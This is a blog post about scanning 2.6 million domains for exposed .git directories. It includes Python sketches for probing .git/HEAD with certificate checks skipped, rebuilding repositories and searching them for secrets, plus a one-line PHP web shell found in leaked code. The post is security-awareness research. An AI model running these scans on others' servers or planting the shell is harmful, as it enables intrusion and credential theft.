Here's What I Found on Scanning 2.6 Million Domains for Exposed Git Directories

Written by sdcat | Published 2022/10/24


I scanned 2.6 million domains for exposed git directories and found more than 1000 public git repositories. Many of these repositories contained only harmless data such as template files or static HTML pages.
However, some repositories revealed interesting things such as complete source code for web applications, configuration files with API keys, usernames, and passwords, database credentials, Office 365 admin logins, private keys, or RCE (remote code execution) possibilities.
Even if the web server does not provide a directory listing for the .git folder, you can still download the entire content of the repository.
TLDR: Watch out for mistakes in the deployment process. Never expose your hidden .git folder to the public.

Why did I do this?

I am SDCat, a software developer with a curious mind who loves to look under the hood of everything. I read about the problem of public .git directories and thought I’d check it out.
In this post, I describe what a git repository is, how I scanned the domains, and some stats about what I found in these repositories. The analysis of this data sometimes revealed shocking details about a software project.

Git repository

In software development, it is normal to use some sort of source control software. One such tool is git, which is free and open source. Source control software saves the whole history of the source code. You can keep track of every change in your code, and you can go back in time to an old version of your code.
Git uses a hidden directory called .git in your project root to save all the code, assets, and metadata. From the data in the .git directory, you can reconstruct the whole source code for each saved version. Even if you committed a configuration file with an API key and removed this API key at a later date, the old commit will still contain the API key.
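To make this concrete, here is a minimal Python sketch of how git stores a single "loose" object: the file is zlib-compressed data made of a short header (type, size, and a NUL byte) followed by the content. The function names and the sample config line are made up for illustration. The point is that an old version of a file stays readable as long as its object is still in the .git directory.

```python
import hashlib
import zlib


def make_loose_object(obj_type: str, content: bytes) -> tuple[str, bytes]:
    """Build an object the way git stores it: zlib("<type> <size>" + NUL + content)."""
    raw = f"{obj_type} {len(content)}".encode() + b"\x00" + content
    # The object id is the SHA-1 of the uncompressed header plus content.
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def read_loose_object(compressed: bytes) -> tuple[str, bytes]:
    """Decompress a loose object and split the header from the content."""
    raw = zlib.decompress(compressed)
    header, _, content = raw.partition(b"\x00")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(content):
        raise ValueError("size in header does not match content length")
    return obj_type, content


# Hypothetical old version of a config file that was "cleaned up" in a later commit.
old_config = b"API_KEY=not-a-real-key\n"
object_id, stored = make_loose_object("blob", old_config)

obj_type, recovered = read_loose_object(stored)
print(object_id, obj_type, recovered)
```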

Why is an exposed git repository interesting/dangerous?

For me, it was very interesting and sometimes shocking to scan 2.6 million domains for exposed git repositories. What I found in the source code could harm a company in different ways. For one, the code itself is leaked.
Sometimes you will find API keys or credentials for databases or email accounts, Office 365 admin accounts, or whole database backups. With deeper analysis of the source code (in this case PHP) some remote code execution possibilities were found:
<?php
echo system($_POST['cmd']);
?>
With this little code snippet, anybody can execute arbitrary commands on the server.
But this is not the end. In the config file (.git/config) of some git repositories, I found the access credentials for the whole source code management system (like GitHub or GitLab), with unrestricted admin access. This happens when the username and password are set in the remote URL, like https://username:password@gitlab.com/.

How did I scan 2.6 million domains for exposed git repositories?

Getting the domains
I chose a country whose domain registry allows DNS zone transfers, which let me obtain all the domains of this country. It takes some time to download the complete zone file. With a simple Python script, I extracted the NS records and, from these records, the domain names.
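The extraction step could look roughly like the sketch below. It is not the original script. It assumes one record per line in the usual zone-file layout (owner name, optional TTL, optional class, record type, data), with the owner name written out on every line. The function name and the sample records are hypothetical.

```python
def domains_from_zone(lines):
    """Collect the owner names of NS records from zone-file lines."""
    domains = set()
    for raw in lines:
        if not raw or raw[0].isspace():
            continue  # blank line, or a record that omits the owner name
        fields = raw.split(";", 1)[0].split()  # drop trailing comments
        if len(fields) < 3:
            continue  # comments and directives such as $ORIGIN or $TTL
        # Skip the optional TTL and class to find the record type.
        rest = [field.upper() for field in fields[1:]]
        while rest and (rest[0].isdigit() or rest[0] in {"IN", "CH", "HS"}):
            rest.pop(0)
        if rest and rest[0] == "NS":
            domains.add(fields[0].rstrip(".").lower())
    return sorted(domains)


# Hypothetical excerpt of a zone file.
sample = [
    "; zone data",
    "example-one.tld.\t3600\tIN\tNS\tns1.hosting.example.",
    "example-one.tld.\t3600\tIN\tNS\tns2.hosting.example.",
    "example-two.tld.\t3600\tIN\tNS\tns1.other.example.",
    "example-two.tld.\t3600\tIN\tDS\t12345 8 2 ABCDEF",
]
print(domains_from_zone(sample))
```

Because every domain usually has several NS records, collecting the names in a set removes the duplicates. The zone's own NS records would also match and may need to be filtered out.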
Scanning process
With another Python script, I read the domains, sent a request to <domain>/.git/HEAD, and checked whether the response body contained ‘refs/heads’. The request was sent over both HTTP and HTTPS.
It is important to skip the SSL certificate check. I learned that many git repositories were reachable over HTTPS, but only with an invalid certificate. By ignoring the invalid SSL certificates, these directories can be accessed anyway.
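The check described above could be sketched as follows, using only the Python standard library. This is an illustration, not the original scanning script: the function names, the timeout, and the 1024-byte read limit are assumptions.

```python
import http.client
import ssl
import urllib.request


def looks_like_git_head(body: str) -> bool:
    """A .git/HEAD file normally contains a line like 'ref: refs/heads/main'."""
    return "refs/heads" in body


def probe(domain: str, timeout: float = 5.0) -> list[str]:
    """Return the URLs under which <domain>/.git/HEAD looks like a git HEAD file."""
    # Skip certificate verification, because many hits had invalid certificates.
    insecure = ssl.create_default_context()
    insecure.check_hostname = False
    insecure.verify_mode = ssl.CERT_NONE

    hits = []
    for scheme in ("http", "https"):
        url = f"{scheme}://{domain}/.git/HEAD"
        try:
            with urllib.request.urlopen(url, timeout=timeout, context=insecure) as resp:
                body = resp.read(1024).decode("utf-8", errors="replace")
        except (OSError, ValueError, http.client.HTTPException):
            continue  # unreachable, timed out, HTTP error status, malformed reply
        if looks_like_git_head(body):
            hits.append(url)
    return hits
```

Calling probe("your-domain.example") with a domain you operate returns an empty list if the HEAD file is not reachable over either scheme.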
If a git repository was found, I also requested the /.git/config file from the server and checked whether it contained a username or even a password for the source control system.
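One way to check a downloaded config file for embedded credentials is to pull out the url entries and let urllib.parse split them. This is a sketch under the assumption that credentials only appear in remote URLs. The function name and the sample config are made up for illustration.

```python
import re
from urllib.parse import urlsplit

# Matches lines such as "    url = https://user:secret@host/path.git".
URL_LINE = re.compile(r"^\s*url\s*=\s*(\S+)", re.MULTILINE)


def credentials_in_config(config_text: str) -> list[tuple[str, bool]]:
    """Return (username, has_password) for every remote URL that embeds credentials."""
    found = []
    for url in URL_LINE.findall(config_text):
        parts = urlsplit(url)
        if parts.username:
            found.append((parts.username, parts.password is not None))
    return found


sample_config = """\
[core]
\trepositoryformatversion = 0
[remote "origin"]
\turl = https://username:password@gitlab.com/group/project.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""
print(credentials_in_config(sample_config))
```

An scp-style remote such as git@github.com:user/repo.git is not reported, because it is not parsed as a URL with a user part. An ssh:// URL would be reported with the generic username git and no password.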
Source code
The git repository was downloaded and extracted with a slightly modified version of GitDumper (https://github.com/internetwache/GitTools, many thanks to @gehaxelt for this awesome project).
Sometimes the web server did not provide access to the whole .git folder, and some files could not be downloaded. I could not figure out why, but even then I could extract some code from most of the repositories.
With the Git Extractor script, all the versions of the code were extracted. With all the different versions and source code files at hand, you can search them for interesting things.
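A directory listing is not needed because the layout of a .git folder is predictable: HEAD names a ref, the ref file contains a commit hash, and every loose object lives at a path derived from its hash. The sketch below illustrates that general idea. It is not the GitTools code, and the hashes and commit text are made up.

```python
import re

HASH = re.compile(r"[0-9a-f]{40}")


def object_path(sha1: str) -> str:
    """Map an object hash to its location inside the .git directory."""
    return f".git/objects/{sha1[:2]}/{sha1[2:]}"


def referenced_hashes(commit_body: str) -> list[str]:
    """Collect the tree and parent hashes from the header of a commit object."""
    header = commit_body.split("\n\n", 1)[0]  # the message follows a blank line
    hashes = []
    for line in header.splitlines():
        key, _, value = line.partition(" ")
        if key in ("tree", "parent") and HASH.fullmatch(value):
            hashes.append(value)
    return hashes


# Made-up hashes and commit content for illustration.
tree_id = "aa" + "0" * 38
parent_id = "bb" + "1" * 38
commit = (
    f"tree {tree_id}\n"
    f"parent {parent_id}\n"
    "author A U Thor <author@example.com> 1666600000 +0000\n"
    "committer A U Thor <author@example.com> 1666600000 +0000\n"
    "\n"
    "Remove API key from config\n"
)

# Each referenced object can be requested next, and so on down the history.
for sha1 in referenced_hashes(commit):
    print(object_path(sha1))
```

Objects that git has packed into packfiles do not exist at these loose paths, so this sketch only covers loose objects.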
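The post does not say how the search was done. One possible approach is a small script that walks the extracted files and flags lines matching a few patterns. The patterns and function names below are hypothetical, and a real search would need a longer, tuned list.

```python
import re
from pathlib import Path

# Hypothetical patterns for illustration only.
PATTERNS = {
    "private key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "password assignment": re.compile(r"(?i)(?:password|passwd|pwd)\s*[:=]\s*\S+"),
    "api key assignment": re.compile(r"(?i)api[_-]?key\s*[:=]\s*\S+"),
}


def scan_text(text: str) -> list[tuple[int, str]]:
    """Return (line number, pattern name) for each suspicious line."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits


def scan_tree(root: str) -> dict[str, list[tuple[int, str]]]:
    """Scan every readable file below root, e.g. a directory of extracted commits."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file():
            try:
                hits = scan_text(path.read_text(errors="ignore"))
            except OSError:
                continue  # unreadable file, skip it
            if hits:
                results[str(path)] = hits
    return results


sample = "DB_HOST=localhost\nDB_PASSWORD=hunter2\n-----BEGIN RSA PRIVATE KEY-----\n"
print(scan_text(sample))
```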
Stats
I scanned 2.6 million domains. Unfortunately, I did not log how many did not respond. I found:
1053 fully or partially exposed git repositories
161 usernames in the git config data
12 usernames with passwords in the git config data
These are the results of only the main domains. Imagine what would happen if we scanned all the subdomains. I have no doubt you’d find a lot more there.
Even after I parallelized the scanning script it took some days to scan the 2.6 million domains. I did not expect many results but was surprised by how widespread the problem is.
Takeaway: Check your server and deployment process so that the hidden .git folder is never exposed.

Written by sdcat | Software developing cat
Published by HackerNoon on 2022/10/24